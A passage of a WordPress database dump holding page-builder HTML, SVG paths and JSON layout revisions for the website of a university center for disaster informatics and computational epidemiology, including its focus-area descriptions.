d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n </svg>\n </div>\n <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-215 style-local-22-h27\">\n <!---->\n <!---->\n <h3 class=\"\">Center for Disaster Informatics & Computational Epidemiology</h3>\n </div>\n </div>\n <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Enabling Data-Driven Disaster Assessment & Planning\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"22-h29\" class=\"h-x-container style-677 style-local-22-h29 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h29-group style-677-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-678-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"https://gsudice.dataconn.net/about/our-mission/\" data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-678 style-local-22-h30 position-relative\"><!----><!----> <span>our mission</span></a>\n </span>\n </div>\n </div>\n <div data-colibri-id=\"22-h31\" class=\"h-x-container style-217 style-local-22-h31 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h31-group style-217-spacing style-local-22-h31-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h32-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\" data-colibri-id=\"22-h32\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h32 position-relative\"><!----><!----> <span>Learn More</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h33-outer\">\n <div data-colibri-id=\"22-h33\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h33 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h34\" class=\"d-block style-221 style-local-22-h34 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h34-image\">\n <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h34-frameImage\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-04-29 09:59:22','2022-04-29 13:59:22','',22,'https://gsudice.dataconn.net/?p=1304',0,'revision','',0),(1310,1,'2022-05-03 13:24:56','2022-05-03 17:24:56','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":336,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c5\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":337,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":335,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c7\",\"parentId\":\"20-c6\",\"partialId\":20,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"20-c7\",\"index\":0,\"id\":\"20-c8\",\"partialId\":20,\"styleRef\":334,\"type\":\"content\",\"props\":{\"content\":\"Focus Areas<br>\"}}],\"styleRef\":333,\"type\":\"content\"}],\"id\":\"20-c6\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":331,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c10\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c10\",\"index\":0,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c12\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease & disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c14\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c14\",\"index\":0,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c16\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c17\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c18\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c18\",\"index\":0,\"id\":\"20-c19\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c20\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"Impact assessment<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c21\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c9\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-05-03 13:24:56','2022-05-03 17:24:56','',168,'https://gsudice.dataconn.net/?p=1310',0,'revision','',0),(1311,1,'2022-05-03 13:24:56','2022-05-03 17:24:56','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-335 style-local-20-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-336-outer style-local-20-c4-outer\">\n <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-336 style-local-20-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-337-outer style-local-20-c5-outer\">\n <div data-colibri-id=\"20-c5\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-337 style-local-20-c5 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"20-c6\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-331 style-local-20-c6 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-333-outer style-local-20-c7-outer\">\n <div data-colibri-id=\"20-c7\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-333 style-local-20-c7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c8\" class=\"h-global-transition-all h-heading style-334 style-local-20-c8 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-334 style-local-20-c8\">\n <!---->\n <!---->\n <h1 class=\"\">Focus Areas</h1>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"20-c9\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c10-outer\">\n <div data-colibri-id=\"20-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c11\" class=\"h-icon style-274 style-local-20-c11 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c11-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c12\" class=\"h-global-transition-all h-heading style-275 style-local-20-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c12\">\n <!---->\n <!---->\n <h5 class=\"\">disease & disaster modeling</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c13\" class=\"h-text h-text-component style-276 style-local-20-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c14-outer\">\n <div data-colibri-id=\"20-c14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c15\" class=\"h-icon style-274 style-local-20-c15 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c15-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c16\" class=\"h-global-transition-all h-heading style-275 style-local-20-c16 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c16\">\n <!---->\n <!---->\n <h5 class=\"\">data as a service</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c17\" class=\"h-text h-text-component style-276 style-local-20-c17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c18-outer\">\n <div data-colibri-id=\"20-c18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c18 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c19\" class=\"h-icon style-274 style-local-20-c19 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c19-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c20\" class=\"h-global-transition-all h-heading style-275 style-local-20-c20 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c20\">\n <!---->\n <!---->\n <h5 class=\"\">Impact assessment</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c21\" class=\"h-text h-text-component style-276 style-local-20-c21 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-05-03 13:24:56','2022-05-03 17:24:56','',20,'https://gsudice.dataconn.net/?p=1311',0,'revision','',0),(1312,1,'2022-05-03 13:24:56','2022-05-03 17:24:56','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>© 